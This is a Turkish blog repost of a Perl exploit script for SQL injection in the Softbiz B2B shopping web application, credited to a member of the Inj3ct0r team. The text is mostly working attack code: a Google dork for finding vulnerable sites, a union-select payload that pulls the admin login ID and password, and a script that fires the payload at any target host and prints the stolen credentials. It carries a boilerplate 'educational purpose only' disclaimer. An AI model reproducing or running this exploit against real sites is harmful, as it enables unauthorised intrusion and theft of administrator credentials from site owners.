Softbiz B2B shopping Sql Injection Exploit (perl)

Softbiz B2B shopping Sql Injection açığı bulunmuş olup perl exploit ve açığın oluşumu şu şekilde.

#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 
#0     _                   __           __       __                     1 
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0 
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1 
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0 
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1 
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0 
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1 
#1                  \ \____/ >> Exploit database separated by exploit   0 
#0                   \/___/          type (local, remote, DoS, etc.)    1 
#1                                                                      1 
#0  [+] Site            : 1337day.com                                   0 
#1  [+] Support e-mail  : submit[at]1337day.com                         1 
#0                                                                      0 
#1               #########################################              1 
#0               I'm Caddy-dz member from Inj3ct0r Team                 1 
#1               #########################################              0 
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 
 
#### 
# Exploit Title: Softbiz B2B shopping sql injection Exploit (perl) 
# Author: Caddy-Dz 
# Facebook Page: http://www.facebook.com/Algerian.Cyber.Army 
# E-mail: islam_babia@hotmail.com  
# Category:: webapps 
# Google Dork: inurl:buyers_subcategories.php 
# Security Risk: High 
# Tested on: Windows Seven Edition Integral / French 
#### 
# 
# Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 
# .. Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers . 
# 
# this was written for educational purpose only. use it at your own risk. 
# author will be not responsible for any damage caused! user assumes all responsibility  
# intended for authorized web application pentesting only! 
 
 
 
 
use LWP::Simple; 
use LWP::UserAgent; 
 
system('cls'); 
system('title Softbiz B2B shopping sql injection'); 
system('color a'); 
 
 
if(@ARGV < 2) 
{ 
print "[-]How To Use\n\n"; 
&help; exit(); 
} 
sub help() 
{ 
print "[+] usage1 : perl $0 site.com /path/ \n"; 
print "[+] usage2 : perl $0 site.com / \n"; 
print "[+] Note ! : do not use (http://) and make space between host and path like the exemple"; 
} 
 
print  "\n****************************************************\n"; 
print  "\n*                coded by Caddy-Dz                 *\n"; 
print  "\n*        email: islam_babia[at]hotmail.co          *\n"; 
print  "\n* Fb Page: http://facebook.com/Algerian.Cyber.Army *\n"; 
print  "\*****************************************************\n"; 
($Target, $path,$file_vuln, $sql_query,) = @ARGV; 
 
my $file_vuln = "/buyers_subcategories.php?IndustryID=-56"; 
my $sql_query = '+union+select+1,2,concat(0x23,LoginID,0x3a,Password,0x23)+from+admin--';  
my $url = "http://" . $Target . $path . $file_vuln . $sql_query; 
print "\n wait!!! \n\n"; 
 
my $request   = HTTP::Request->new(GET=>$url); 
my $useragent = LWP::UserAgent->new(); 
$useragent->timeout(10); 
my $response  = $useragent->request($request); 
if ($response->is_success) { 
my $res   = $response->content; 
if ($res =~ m/[#](.*):(.*)[#]/g) { 
my ($username,$password) = ($1,$2); 
print "[+] $username:$password \n\n"; 
} 
else { print "[-] Error, Fail to get admin login.\n\n"; } 
} 
else { print "[-] Error, ".$response->status_line."\n\n";  
}  

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir